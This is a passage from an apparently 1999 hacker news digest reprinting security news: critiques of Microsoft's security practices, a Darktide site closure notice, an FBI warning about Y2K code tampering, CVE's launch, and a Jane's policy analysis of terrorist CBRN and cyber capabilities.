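work, and each half is a 7-character upper-case search rather than a
14-character mixed-case one. That is why an MS-CHAP exchange or a dumped SAM
yields to offline guessing, and why the remedy is to stop storing and sending
LM hashes at all (the NoLMHash setting and a raised LMCompatibilityLevel on
later Windows versions) rather than to pick longer passwords.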
Part of the problem is Microsoft's use of so-called hidden APIs, which are kept secret from third-party developers, Rubin says. These allow Microsoft developers to take shortcuts but can also lead to security problems because they aren't scrutinized as public ones are.

Hacker Tweety Fish accuses Microsoft of historically implementing "horribly insecure" APIs. "Both Back Orifice and BO2K were built using standard Microsoft APIs; every piece of scary, worrisome functionality is BUILT IN to Microsoft Windows," he wrote. "If these APIs were open to public scrutiny, I doubt such terrible ideas as WNetEnumCachedPasswords [which cheerfully reveals all cached passwords on the system] would exist."

Microsoft's Culp couldn't categorically deny that the company uses hidden APIs, but in general he argued that integration is necessary to give advanced products to users. "Microsoft doesn't believe that the way to provide security is to make our applications incompatible with each other," he says. "That's not what our customers want. They want seamless integration."

Tightly integrated applications provide productivity improvements and can still be secured, Culp says. For example, Office 2000 macros can be disabled or allowed to run: automatically, only when digitally signed, or only when signed from trusted sources.

PR treatment

Technical debates aside, most of the critics complained that Microsoft often treats security issues like PR problems that need to be averted and not resolved.

The main security problem is "marketing driven product design at Microsoft, and the fact that they will not consider any given security risk a problem until it becomes a problem in the press," hacker Tweety Fish says.

He and others complained that Microsoft often denies security problems before being forced to address them with a fix after they are made public, and that the company tries to minimize their scope and put a spin on them.
For instance, the company downplayed the Jet/ODBC [open database connectivity] exploit in a Microsoft Security Bulletin over a year ago so that "almost nobody" bothered to install the patch and users were caught off-guard when it made headlines recently, the hacker says.

The company downplays the extent of a problem by not mentioning all the situations in which it could arise, saying it is limited to only specific situations and claiming that no customers have been affected, the experts say. For instance, when issuing alerts about browser bugs Microsoft usually doesn't point out that they can occur in e-mail, Smith says.

But Smith and some of the others conceded that Microsoft's response time has improved in the past few years. For example, Microsoft released a workaround immediately and a patch four days later for a recent security exploit in Internet Information Server, and "that's probably as responsive as any company would be," McCown says.

"A quick fix may break something else," Schultze of Security-Focus says. "They're being thorough. It may not be as quick as some people might like."

Smith says he could think of two or three problems Microsoft decided not to fix because of disagreement on their seriousness. For instance, he says it took Microsoft a year to change its mind and admit that it is not secure to have a Word document embedded in an e-mail or a Web page be able to start up the Word application. In addition, Microsoft still maintains that JavaScript executables in e-mail shouldn't be disabled by default.

Culp denied the allegations that the company is reluctant to admit exploits or their scope. The company's security response team is quick to address and fix problems, monitors security mailing lists for reports and works closely with security groups, he said.
When a vulnerability is confirmed, the company sends e-mail alerts to customers who have asked to be put on a list at secure@microsoft.com and others, and posts information on its security Web site at www.microsoft.com/support and www.microsoft.com/security/services/bulletin.asp, Culp said. Microsoft has more than 200 full-time employees working on nothing but security, he added.

"We look into every issue that's reported," he said. "Out of those 10,000 queries and reports (received in the past year) and all the things posted to the mailing lists, etc. there have been about 30 issues that we have needed to provide a patch for this year," and 40 or 45 over the last 12 months, Culp said.

Only about 5 percent of the reports Microsoft gets turn out to be bona fide security vulnerabilities, according to Culp. Many end up being problems due to unclear documentation, incorrect implementations of the software or code, or users not following best practices, he said.

In recent swift work, Microsoft released a security bulletin just hours after an IE vulnerability was announced September 10, telling users how to protect against it while a patch is developed, Culp noted.

Meanwhile, Microsoft has taken a new approach and put a Windows 2000 test server online for users to try to hack. The system has held up although it got off to a rocky start and was down for several days after lightning hit a router right after it was put online.

Cooper of NTBugtraq predicted that the security situation will improve for Microsoft as consumers become more savvy and demand more security in products. "Certainly there's been a change in Microsoft in the last two years to do things with far more security in mind," he said. "The reality is they're doing it to an extent that consumers will tolerate and to an extent that consumers will demand."

Users are content

Several users said they have no complaints with Microsoft's products or attitude.
"From my perspective, what Microsoft is doing is right on target," said Greg Scott, IS manager at Oregon State University's College of Business in Corvallis. "I want the interoperability the tools provide me so I can move things cleanly, simply and easily between systems. And I'm willing to suffer the minor inconvenience of having to pay more attention to security and patches," he said. "As long as they provide patches and fixes in an appropriate timeframe, then I'll use their products."

Another user said he likes Microsoft software specifically because of its integration. Ty Simone, IS manager at Onsite Sycom Energy Corp., an energy service company based in Carlsbad, California, said he's not bothered by Microsoft's usability versus security tradeoff.

"I would much rather have the control here than have Microsoft saying 'You can't do anything until you change something,'" he said. "For example, the default for IE is medium. If they set it to high, until I get to that user and set it to medium that user couldn't access the corporate intranet, much less the Internet."

Simone also praised Microsoft for reacting swiftly and forthrightly when issues arise, noting that Unix users don't get security bulletins e-mailed to them like Windows users do. Unix gets more hacks but less press than NT does, Simone says, adding that "It's not popular to bash the little guy."

Unix, Linux, MacOS

So how do the Windows alternatives fare?

The MacOSX "add-on programs look to be just as vulnerable (as Windows) -- there are permissions problems and plenty of coding issues," Dr. Mudge of Boston-based hacker group L0pht Heavy Industries wrote in an e-mail. "However, a quick look would imply that the core OS might be much more secure than NT's core components. This is most likely due to the fact that the new MacOS's are really BSD 4.4 (Unix) and mach memory systems. Both have been around for decades to have the kinks worked out of."
Meanwhile, open source operating systems tend to be more easily secured than closed source ones like NT, "because there are more people doing more work to find the holes, and it's easier for researchers to develop patches for exploits they find," hacker Tweety Fish said. The most secure platform "out-of-the-box" is OpenBSD because security is a focus of the project, he said. "It is not perfect; no OS is, but with OpenBSD you can guarantee that security is their first priority."

The favored underdog, Linux, is considered experimental at this point, but it may end up giving NT a good run for its money, according to Winn Schwartau, founder of Security Experts consultancy in St. Petersburg, Florida, and author of "Information Warfare" and other books. Most of his clients, who include governments, NATO and other multinational organizations, use Unix now, he added.

Despite the complaints about the security in Microsoft software, Culp said customers - including government agencies and organizations in the healthcare, insurance and banking industries - feel comfortable using the company's products.

And Cooper of NT Bugtraq noted that Windows is "hugely accepted, widely deployed and largely liked" by users. "I don't think Windows is more or less secure than some other operating system," Cooper said. "I think that there are technologies from Microsoft that are good; there are others that are not good; and there are others that still need to be refined and improved, but that are still very much in demand."

But hacker Space Rogue, a member of L0pht Heavy Industries, summed up what he and others see as Microsoft's security challenges. "Windows has three strikes against it, as I see it. Popular OS, weak security, easy-to-use, oh, and it is made by MS, the company everyone loves to hate."

@HWA

29.0 Darktide Hacking Is Closed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Outkast
After almost 2 years Darktide Hacking has closed its doors.
The site offered underground news, newbie help guides, Linux documentation and more. They will be missed. Outkast, the site's web master, hopes to open a new site with a different focus soon.

Darktide Hacking
http://www.darktide.com

From the site:

The time has come for me to close down Darktide as we know it. Darktide was a blast to run, but the time has come for me and my crew to start making an income on the Internet. I need to have a real income, just like all you. I could have made money with Darktide, but I will not sell-out. I will not turn Darktide into the next AntiOnline Network. I don't want to make money off of hacking, I have too much respect for you, the hackers, for the underground.

Darktide will be turning into a netcenter. Access to (but not limited to) many search engines, free web-based E-mail, news, and documentation. We will still have information on Linux, encryption, and programming (and more). We will still have everything that is on Darktide.Com right now (but not limited to), minus the text files on hacking. You have my word. We will continue to open the doors to information.

You, the hackers, made me. Without you, there would be no Darktide Hacking. I owe it all to you. I just want you all to know that I will never forget the underground, and never leave the underground behind. I hope to still see a link to Darktide on your pages, and I hope that you will not forget about me and my crew.

What is money? Money is the root of all evil. We must handle it with care, or we will be the next AntiOnline. What is life? Life is like a big obstacle. Every time you think your problems might be gone, they will come right back at you. I hope that you all will make hacking your problemless life whenever you can. I know I will, till my life ends.

I will miss it,

-Outkast (Founder of Darktide, Inc.)

More Information:

Closing time: Closed.
New site opening time: Date not known yet. We will post the opening date when we have one.
Contact

We have been getting a lot of questions sent to our contact@darktide.com E-mail box. Because Darktide will soon be moving to a different server, that E-mail address might be down for a few days in this upcoming week so we would like you to send questions to another address. If you would like to contact us please use this E-mail address.

darktide@interaccess.com

Or you can send us mail at:

Darktide
P.O. Box 465
Lake Forest, IL 60045

@HWA

30.0 NIPC Head Warns of Y2K Bug Fixes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by mmullin3
Michael Vatis, who heads the interagency National Infrastructure Protection Center, has said that they have found indications that malicious code was being installed at the same time as Y2K fixes. The finger was pointed at fixes done by programmers from India and Israel as well as Ireland, Pakistan and the Philippines. Exactly what indications were found is not made clear. It would seem that the severity of this problem isn't really known and that a lot of people just seem to be guessing.

MSNBC
http://www.msnbc.com/news/317848.asp

Cyber cop warns of Y2K tampering
Evidence seen that contractors are making malicious changes under the guise of Year 2000 repairs

REUTERS

WASHINGTON, Sept. 30 — Malicious changes to computer code under the guise of Year 2000 software fixes have begun to surface in some U.S. work undertaken by foreign contractors, the top U.S. cyber cop said on Thursday.

“WE HAVE SOME INDICATIONS that this is happening” in a possible foreshadowing of economic and security headaches stemming from Y2K fixes, Michael Vatis of the Federal Bureau of Investigation told Reuters.

Vatis heads the interagency National Infrastructure Protection Center (NIPC), responsible for detecting and deterring cyber attacks on networks that drive U.S. finance, transport, telecommunications and other vital sectors.
A Central Intelligence Agency officer assigned to the NIPC said recently that India and Israel appeared to be the “most likely sources of malicious remediation” of U.S. software.

“India and Israel appear to be the countries whose governments or industry may most likely use their access to implant malicious code in light of their assessed motive, opportunity and means,” the CIA officer, Terrill Maynard, wrote in the June issue of Infrastructure Protection Digest.

Beware the millennium bug repair

Significant amounts of Y2K repair are also being done for U.S. companies by contractors in Ireland, Pakistan and the Philippines, according to Maynard. But they appear among the “least likely” providers to jeopardize U.S. corporate or government system integrity, although the possibility cannot be ruled out, he wrote.

Thousands of companies in the United States and elsewhere have contracted out system upgrades to cope with the Y2K glitch, which could scramble computers starting Jan. 1 when 1999 gives way to 2000.

The CIA declined comment on Maynard’s article. Referring to it, Vatis said: “This is our effort to put out in the public information that hopefully can be useful to people.”

Vatis, interviewed in his 11th floor office at FBI headquarters, said that so far “not a great deal” of Y2K-related tampering had turned up. “But that’s largely because, number one, we’re really dependent on private companies to tell us if they’re seeing malicious code being implanted in their systems,” he said.

In reporting evidence of possible Y2K-related sabotage of software, Vatis confirmed one of the worst long-term fears of U.S. national security planners.

“A tremendous amount of remediation of software has been done overseas or by foreign companies operating within the United States,” Vatis said. He said it was “quite easy” for an outsider to code in ways of gaining future access or causing something to “detonate” down the road.
This could expose a company to future “denial of service attacks,” open it to economic espionage or leave it vulnerable to malicious altering of data, Vatis said.

The Special Senate Y2K committee, in its final report last week, described the issue as “unsettling.”

“The effort to fix the code may well introduce serious long-term risks to the nation’s security and information superiority,” said the panel headed by Robert Bennett, Republican of Utah, and Chris Dodd, Democrat of Connecticut.

The panel said the long-term consequences could include:

 - Increased foreign intelligence collection
 - Increased espionage activity
 - Reduced information security
 - Loss of economic advantage
 - Increase in infrastructure vulnerability

Vatis, in testimony before the Y2K panel in July, warned that contractors could compromise systems by installing “trap doors” for anonymous access. By implanting malicious code, he said, a contractor could stitch in a “logic bomb” or a time-delayed virus that would later disrupt operations. Another threat was insertion of a program that would compromise passwords or other system security, he said.

© 1999 Reuters Limited. All rights reserved. Republication or redistribution of Reuters content is expressly prohibited without the prior written consent of Reuters.

@HWA

31.0 Better Computer Security Needs More Than Just Laws
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Code Kid
In testimony before a Congressional Committee yesterday, federal and industry experts said that while enhancements to the twelve-year-old Computer Security Act are needed, laws alone are not going to fix underlying security issues on the internet. Increasing the role of the National Institute of Standards and Technology to establish security guidelines for federal agencies would be one of the goals of the Computer Security Enhancement Act of 1999.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0927/web-security-9-30-99.html

SEPTEMBER 30, 1999 . . . 17:18 EDT

Law is only part of better computer security, Congress told

BY DIANE FRANK (diane_frank@fcw.com)

Federal agencies would benefit greatly from a proposed enhancement to a 12-year-old computer security law, but legislation alone cannot solve some underlying information security problems, federal and industry experts told Congress today.

The Computer Security Enhancement Act of 1999 would increase the role and resources of the National Institute of Standards and Technology by establishing security guidelines that federal agencies could follow. The bill would beef up the Computer Security Act, which requires civilian agencies to protect computer systems. The Computer Security Enhancement Act passed the House last year but failed to move in the Senate.

The bill will not necessarily make federal computers safer, said Raymond Kammer, director of NIST. Agencies must understand that the responsibility for securing computers and transactions starts with agencies and that they must put in place steps to meet those demands, he said. "Only they can decide how valuable the data is and then how to protect it," Kammer said.

The act also would provide additional resources to NIST for funding security scholarships and internships for students, part of a solution to the growing shortage of security professionals within government and industry.

"You can't help [ease] this [IT worker shortage] by bringing in immigrants," said Harris Miller, president of the Information Technology Association of America. "You can't outsource this to another country. We need to have specialists in this country."

@HWA

32.0 New NT Security List Started
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond
A new mailing list devoted to NT Security that promises to be completely full disclosure has been started.
The new list, NT Security Advice, will be moderated by Steve Manzuik and is open to anyone interested in, or working with, Microsoft Windows NT and Security.

TO SUBSCRIBE: Send an email to maillist@ntsecadvice.com

@HWA

33.0 Computer Security Dictionary Released
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by no0ne
MITRE Corporation has recently unveiled the first Public Dictionary of Computer Vulnerabilities, "in order to boost cyber-defense". "Common Vulnerabilities and Exposures [CVE]" contains standardized names and descriptions of more than 300 known security vulnerabilities and exposures, making the sharing of data among various vulnerability databases and security tools easier.

Computer World
http://www.computerworld.com/home/news.nsf/all/9909293cved

Mitre unveils security 'dictionary'
By Kathleen Ohlson

In an effort to find common ground for different vulnerability databases and security tools, the Mitre Corp. today rolled out its Common Vulnerabilities and Exposures (CVE) effort.

The CVE is a public dictionary that consists of standard names and descriptions for more than 300 security vulnerabilities and exposures. Common names will allow data to cross separate databases and tools, officials said.

Based in Bedford, Mass., Mitre is an independent, nonprofit company offering technical support to the government. It developed the list with 19 security organizations, including Cisco Systems Inc., Internet Security Systems and the CERT Coordination Center at Carnegie Mellon University, that make up the CVE Editorial Board.

Related story: Mitre to announce security 'dictionary', Sept. 28, 1999
http://www.computerworld.com/home/news.nsf/all/9909282mitre

@HWA

34.0 CyberWarfare - Real or Imagined?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Lady Sharrow
An interesting article from the free section of Jane's Intelligence Monthly.
This is a quite long article but it covers the use of Hi-Tech weapons by terrorist organizations. Most of the article is concerned with 'conventional weapons' i.e. chemical, biological, nuclear etc but the basic assumptions are also applied to cyber warfare. This is talking about 'serious' use of these weapons rather than the average web page defacement.

Jane's Intelligence Monthly
http://jir.janes.com/sample/jir0499.html

Document created: 21 SEPTEMBER 1999

Cyberwarfare: fact or fiction?

Now that cyberwarfare has become an accepted fact, Joshua Sinai examines the requirements for anti-state groups to employ this and chemical, biological, radiological and nuclear weaponry.

As the 21st century approaches, there is great concern in worldwide national security circles about preparations by terrorist groups, either on their own or jointly with state sponsors, to exploit the increasing availability of sophisticated lethal technologies to launch mass destruction and mass disruption warfare against their enemies' populations and critical infrastructures. Mass destruction warfare utilises chemical, biological, radiological and nuclear (CBRN) weaponry, whereas cyber terrorism utilizes information technology (IT) devices to inflict mass disruption of an opponent's critical IT infrastructure.

The concern about the likelihood of CBRN/Cyber terrorist attacks is driven by the emergence of new types of terrorist groups which possess the motivation and technical capability to launch such attacks, and particularly a power drive by their leaders to propel their groups on the international arena as a first order of magnitude technological destroyer and menace.
Only a select number of terrorist groups and few state sponsors are likely to possess the necessary motivation and capability in the spheres of organisation, funding, acquisition, technology, storage and stockpiling, logistics, and other overt and covert resources to be able to make the transition from conventional to CBRN/Cyber warfare. For many, the numerous internal and external tasks and hurdles involved in acquiring, storing and deploying such sophisticated weaponry and devices are simply too much.

Moreover, few terrorist groups and state sponsors are sufficiently motivated to carry out mass casualty or mass disruption warfare. For many, small scale conventional attacks such as car or truck bombings cause sufficient death and destruction to achieve the objective of terrorising a targeted population and its government in order to compel them to pay attention or make concessions to an insurgent's cause and grievances.

Nevertheless, there is sufficient reporting of activities by terrorist groups and their state sponsors in the CBRN/Cyber realm to provide the necessary indications and warning (I&W) indicators to usher in a new paradigm of super, ultra, and macro-type catastrophic terrorism. For terrorists, CBRN/Cyber weapons provide the opportunity to cause death and disruption at unprecedented levels - resulting in thousands of casualties and billions of dollars in damages to critical infrastructure nodes.

However, depending on the levels of sophisticated technologies deployed, acquiring a CBRN/Cyber capability requires extensive funding, an overt or covert acquisition capability, a technological research and development program to produce, weaponise and stockpile CBRN materiel (or the capability to purchase or steal ready-made weapons), and a level of technical expertise and logistical infrastructure that is appropriate to launch successful CBRN attacks. This is beyond the technical capability or motivation of most terrorist groups.
On the other hand, the information revolution ushered in by the Internet allows terrorists to access articles and documents from the World Wide Web about the manufacture or acquisition of BW or CW agents, and commercial-off-the-shelf (COTS) software products can easily be obtained to conduct cyberterrorism, making CB/Cyber attacks much more feasible to launch than hitherto. Radiological and nuclear weapons, however, are far more difficult for terrorist groups to acquire or to develop indigenously, to weaponise and deploy, or to provide storage for.

Although such cost/benefit considerations may limit the majority of terrorist operations to the realm of conventional warfare in the 21st century, recent WMD-related events and reports indicate increasing activity by certain terrorist groups and state sponsors in the CBRN/Cyber arena. This has been accompanied by a lowering of the threshold for their conviction that conventional attacks are insufficiently effective and that a more lethal form of mass casualty or mass disruption violence is required to achieve their goals.

Thus, the primary differences between conventional and CBRN/Cyber terrorism lie in the areas of motivation, organisation, funding, and capability in the realms of acquisition, technology, and logistics. There is also the issue of the capability to overcome external hurdles. These include acquisition of the necessary technologies, cooperation by foreign suppliers, creation of a logistics network for acquisition and deployment, obtaining state sponsorship, and also detection, penetration, and deterrence by foreign intelligence and counterterrorism agencies.

There have already been several instances of CBRN/Cyber operations by terrorist groups. Chemical attacks have been mounted by the Aum Shinrikyo cult, such as the March 1995 sarin nerve gas attack on the Tokyo subway system, killing 12 people and injuring 5,500.
Chemical cyanide was included with explosives in the February 1993 bombing attack by Islamic militants of the World Trade Center. In the mid-1980s, the Tamil secessionist group, LTTE (which provides its operatives with a cyanide pill in the event of capture) threatened to carry out a BW attack by spreading pathogens to infect humans and crops in Sri Lanka. Aum Shinrikyo also attempted, albeit unsuccessfully, on at least 10 occasions to disperse biological warfare agents in aerosol form, and in October 1992 its members attempted to acquire Ebola virus samples in then Zaire for future use in biological attacks. In mid-1997, an American white supremacist faction plotted to attack the New York City subway system with biological weapons. Reportedly, Hizbullah and Hamas operatives have acquired chemical and biological components, although they have so far refrained from carrying out such attacks.

Until its top leaders were arrested, some members of the Aum group also studied uranium enrichment and laser technology which are necessary for acquiring the capability to develop nuclear weapons. The group had one or possibly more of its followers on the staff of the Russian Kurchatov Institute's nuclear physics laboratory. In September 1998, Mamdouh Mahmud Salim, a top aide to Osama Bin Laden was arrested in Munich while trying to procure enriched uranium for developing nuclear weapons.

One of the first known instances of cyberterrorism occurred in 1997 when the LTTE launched cyber attacks against Sri Lankan government sites, including hacking into a government web site and altering it to transmit their own political propaganda. Supporters of the Mexican Zapatista rebels have jammed Mexican government web sites. The American terrorist group, the Christian Patriot movement, is active on the Internet. The Osama Bin Laden group utilises an extensive network of computers, disks for data storage, and Internet for e-mail and electronic bulletin boards to exchange information.
Hamas operatives in the Middle East and elsewhere use Internet chat rooms and e-mail to coordinate activities and plan operations. Other Middle Eastern terrorist groups, such as Lebanon's Hizbullah and Algeria's Armed Islamic Group, also utilise computers and the Internet for communications and propaganda. Terrorists have also targeted critical infrastructure. Thus, for example, in the summer of 1998, the LTTE bombed state-owned and private telecommunications facilities in Sri Lanka, damaging buildings and disrupting telephone service.

Motivation

Motivation concerns the psychological, political and strategic factors that are likely to serve as incentives or disincentives for terrorist groups to resort to CBRN/Cyber warfare, particularly the decision to embark on a higher lethality and disruption in targeting. Motivations are an important factor because they influence a group's destructive or disruptive potential and the paths and links that they are likely to pursue to acquire the necessary technological and operational capabilities to launch CBRN/Cyber attacks. It is important to assess these motivations because a misunderstanding of a terrorist group's decision making regarding CBRN/Cyber warfare could lead to underestimating or overestimating a group's CBRN/Cyber capability, surprises about unanticipated attacks, the types of weapons chosen, the timeframe for such attacks, and likely targets.

The psychological factors that are likely to drive terrorist groups to embark on CBRN/Cyber warfare might be irrationally or rationally based. Thus, irrational factors might be characterised as leadership by extremist, paranoid or criminally insane border-line personalities, who are driven by a suicidal 'culture of death'.
On the other hand, rationally-based factors would include a need for the great prestige and power that such weapons would provide or the pursuit of mass-casualty type vengeance against particularly repressive government policies or excessively harsh government retaliation. Both types of psychological actors tend to be authoritarian, and, although the latter type might behave like rational actors, both types reject commonly accepted societal norms, standards or proportions that would make them less inclined to exceed a certain violence and mass casualty threshold, and thus they would be more prone to commit catastrophic violence and disruption.

The political factors that would motivate terrorist groups to resort to catastrophic warfare range from particular to broad grievances against a perceived enemy state, sub-state actors or transnational organisations, and their objectives vary from revolution, secession for a religious, ethnic or national community, to nihilism and the complete destruction of a state. A second set of political factors that are particularly susceptible to a lack of conventional constraints on catastrophic violence are religious beliefs that advocate visions of apocalyptic millennialism, messianic apocalypse or redemptiveness, in which CBRN/Cyber type violence is employed to hasten in a new millennium, the arrival of a messiah, or a new order. This is particularly the case with messianic groups such as Aum Shinrikyo which view the society that they seek to destroy as inherently worthless and offer their adherents a path to a higher existence through rebirth in the next life. A third set of political factors includes virulent racist or ethnic hatreds by terrorist groups, the resolution of which they believe would be achieved by the destruction or annihilation of the enemy community.

Strategy vis-à-vis CBRN/Cyber warfare concerns how a terrorist group's leadership defines its broad objectives and the means and targets necessary for their attainment.
For example, a terrorist group that is inclined towards a strategy of minimising risk or failure, of using violence to influence, but not destroy an opponent, is concerned about backlash within its own community or intended audience, and fears massive military retaliation by a foreign state against its own group and supporting community, might be more likely to adopt tactics that call for conventional warfare, whereas a group whose strategy is unconstrained by these factors might be more likely to pursue the CBRN/Cyber catastrophic option. Thus, an extremist religious terrorist group that regards violence as a sacramental act or divine duty, and the constituency of which is limited to its own group, would likely be unconstrained to employ the most lethal violent means at its disposal. A further strategic objective might be to carry out or threaten to carry out a CBRN/Cyber attack in order to perpetrate an economic extortion or to massively damage a critical infrastructure node, such as a food supply. Another strategic consideration concerns the decision whether or not to seek state sponsorship and assistance in CBRN/Cyber warfare. A final consideration is whether the group needs to claim credit for a CBRN/Cyber attack. In fact, the reduced need to claim credit for such attacks signals the emergence of the "silent terrorists," and is another factor contributing to loosening self-imposed constraints against higher levels of lethality.

Organization

There are no fixed organisational prerequisites for attaining CBRN/Cyber capability, particularly in the age of the Internet when terrorist operatives can be dispersed geographically yet are able to communicate with each other by using their own secured communications networks.
At one end of the organisational spectrum, the technological complexities involved in acquiring CBRN/Cyber capability require a well organised, hierarchical organisation, with a command and control apparatus staffed by professional terrorists, a highly-developed R&D apparatus staffed by scientists and technicians, production and storage facilities, a transnational logistics network to clandestinely acquire the necessary technology from external sources, and business activities (either legitimate or illegitimate) to generate the necessary income to fund the acquisition of CBRN/Cyber operational capability.

At the other end of the organisational spectrum, a CBRN/Cyber operational capability might be acquired by a terrorist entity of a transitory, ad hoc amalgamation that bands together for a single mission, that is less cohesive and more diffuse organizationally, and is staffed by a small number of professional operatives and amateur associates. In addition, such groups, such as the Osama Bin Laden network, do not generally operate out of geographically bound sanctuaries or safe-havens and their activities are not confined to specific operational areas, but are dispersed worldwide.

The use of amateurs by professional terrorists is significant because these can be used as pawns, cut-outs or expendable minions to conceal the identity of the particular organisation or state sponsor that actually orders or commissions a CBRN/Cyber attack. In such a case, CBRN/Cyber warfare would be carried out by an organizationally ad hoc terrorist entity, backed by a state sponsor, that joins forces for a specific one-time operation.

A related organisational issue is the degree of technical and military professionalization required by terrorist groups to conduct CBRN/Cyber warfare, or whether amateurs can develop such capability, particularly when aided by a state sponsor.
Thus, to pursue the CBRN/Cyber warfare option, do terrorist groups need to recruit individuals with technical degrees and expertise in disciplines such as chemistry, biology, physics, engineering and computer science? Moreover, does a group need to organise the training on its own or is a state sponsor required to provide instruction and facilities? A terrorist group might also train its members in not just a single weapon but a variety of CBRN/Cyber weapons for which different sets and levels of technological expertise are required in order to attain operational capability in each of these weapons. Thus, for example, terrorist groups, such as Aum Shinrikyo, have provided their members with extensive training and education in a variety of CBRN/Cyber weapons, including studying uranium enrichment and laser technology, with at least one of their members working on the staff of a Russian nuclear physics laboratory, while another contingent traveled to Africa to study the Ebola virus.

Cyberwarfare involves a different set of training requirements that is also more readily available. Thus, training in computer science is now widely prevalent among terrorist groups.

Funding

Significant financial resources are required for terrorist groups to develop an indigenous CBRN/Cyber operational capability unless a group succeeds in weaponising a crude, low-technology device, or stealing or hijacking such a device. In general, a range of costs are involved in acquiring, operationalizing, stockpiling and deploying CBRN/Cyber weapons of varying levels of sophistication and lethality. As a result, financial considerations play a role in deciding whether a group will choose single or multiple CBRN/Cyber weapons, the types of dispersal systems, and whether these weapons will be indigenously developed, obtained from an external source (whether legally or through smuggling, hijacking or theft), or are provided by a state sponsor.
CBRN/Cyber weapons for use in terrorist attacks vary greatly in their cost. For example, acquiring production and operational capability to deploy chemical, biological, radiological, or cyber capability involves relatively small financial resources, and are within the means of many terrorist groups. Far more significant financial resources, which only a few groups possess, are necessary to acquire a nuclear weapons capability. Nevertheless, some terrorist groups, such as the Aum Shinrikyo in its heyday, the Bin Laden network, or Colombian narco-traffickers, could, potentially, acquire a miniaturized nuclear weapon because of the vast financial resources accruing from their multiplicity of legitimate and criminal business enterprises. To launch a cyber attack, a terrorist group could purchase relatively inexpensive commercial-off-the-shelf (COTS) software and hardware, with some weapons of mass disruption software available on hacker bulletin boards and Web sites.

State Sponsors

Obtaining the sponsorship of a state with WMD resources can be a major facilitator in transitioning to CBRN/Cyber terrorism. There are a number of motivations, requirements, and bureaucratic considerations involved in the relationship between terrorist groups and potential state sponsors regarding the resort to CBRN/Cyber warfare. However, obtaining the support of a state sponsor is not automatic or inevitable. Potential state sponsors would have to weigh the costs and benefits involved in sponsoring CBRN/Cyber operations by terrorist groups, including providing assistance in the phases of research, development, production, and operations planning. Other issues concern the conditions and arrangements for providing the terrorist group with CBRN/Cyber weapons, training, logistics, diplomatic cover and deniability. Thus, a number of cost/benefit factors are involved in the relations between state sponsors and surrogate terrorist groups. For both there are advantages and disadvantages.
For terrorist groups, state sponsorship can provide assistance in terms of funding, intelligence, CBRN/Cyber weaponry, technical expertise, training, laboratories, logistics, target reconnaissance and surveillance, escape assistance and safe haven, diplomatic cover, and deniability. Thus, for example, attaining the support of a state sponsor with nuclear capability (such as Iran, Iraq, Pakistan or North Korea) would shortcut the process of fabricating a high-grade nuclear bomb with weapons-grade material, which would be extremely difficult, although not impossible, for most terrorist groups to develop on their own. Such a nuclear weapon, however, would likely be miniaturised and of a tactical, not a strategic variety.

State support need not be explicit or direct. Thus, a state sponsor might indirectly influence or remotely control a terrorist group's actions. A state sponsor might use amateur terrorists as dupes or cut-outs to conceal their involvement, and thus avoid the possibility of retaliation.

External Hurdles

There are a number of external hurdles that terrorist groups must overcome in order to acquire operational CBRN/Cyber capability. These hurdles include technological and logistical factors, obtaining state sponsorship and deterrence by foreign intelligence and counterterrorism agencies.

In terms of technological hurdles, CBRN weapons and Cyber devices vary in the levels of technological sophistication required for their development, weaponization and deployment. There is also a clear distinction between CBRN weapons and Cyber devices. Cyberterror devices involve high end technologies, although of a different magnitude than CBRN weapons, because, among other factors, the means required to access and achieve the massive destruction or breakdown of a critical infrastructural information technology (IT)-type target involve entirely different kinds of delivery systems (eg computers).
CBRN weapons are generally at the high end of the technological spectrum, although within this high end range there are gradations of technological sophistication that terrorists are likely to utilise because of the variances in their own operational capabilities. In general, the ranking of CBRN weapons involves consideration of the levels of technological sophistication required to develop a particular CBRN weapon and the potential weapon effects. Thus, if potential weapon effects are being ranked, chemical devices would be placed at the low end with tactical nuclear and biological weapons at the high end. On the other hand, in terms of levels of sophistication required to develop CBRN weapons, the ranking would begin with the lower end chemical and biological to the higher end radiological and nuclear. The reason for this ranking is the relative ease with which it is possible to construct crude chemical and biological devices. Weapons grade biological agents from a producer-country such as Russia are also particularly vulnerable to theft or smuggling. Radiological and tactical nuclear weapons are harder to develop, although crude approximations of them are feasible for some terrorist groups.

Among CBRN weapons, the most substantial hurdles lie in the fabrication and deployment of nuclear weapons. There are enormous technological tasks involved in acquiring and utilising weapons grade materials, such as highly enriched uranium or plutonium, to produce nuclear explosives. Other than the hurdle of indigenously producing a nuclear device, terrorist groups would have either to purchase such a device from external sources, to obtain it from a state sponsor, or to steal or smuggle it.
Tactical nuclear weapons, as opposed to strategic nuclear weapons, are most vulnerable to theft or illegal purchase by terrorist groups because of their relatively small size, widespread dispersal, and the absence among older generations of these weapons of effective electronic locks or Permissive Action Links (PALs) to prevent their unauthorized use. There are also complex technical requirements involved in deploying a nuclear explosive device, particularly in dispersing radioactive material. In all these cases of CBRN weapons, it may not be necessary for terrorist groups to acquire actual battlefield weapons; certain crude devices or delivery and dispersal systems may not achieve mass destruction effects, but might be sufficient to inflict mass terror.

The logistics hurdle involves the capability by terrorist groups to create an organizational apparatus and transnational network not only to acquire the technology to produce CBRN/Cyber weapons and devices, but to conduct target reconnaissance and surveillance, and then to transport, deliver, disperse and disseminate the weapon against the intended target and, if possible, carry out an escape.

Obtaining state support represents another external hurdle. A state sponsor might be reluctant to collaborate with a terrorist group in the CBRN/Cyber warfare realm because of the enormous political costs and risks of retaliation and exposure. Moreover, there is always the possibility that a terrorist group might prove unreliable or inefficient, or, in a worst case scenario, use CBRN/Cyber weapons against their sponsor. On the other hand, there are certain factors, conditions and circumstances that are likely to facilitate cooperation and joint ventures between state sponsors and terrorist groups. Thus, for example, using a surrogate group could enable a state sponsor to achieve certain strategic objectives while denying its role in such an attack.
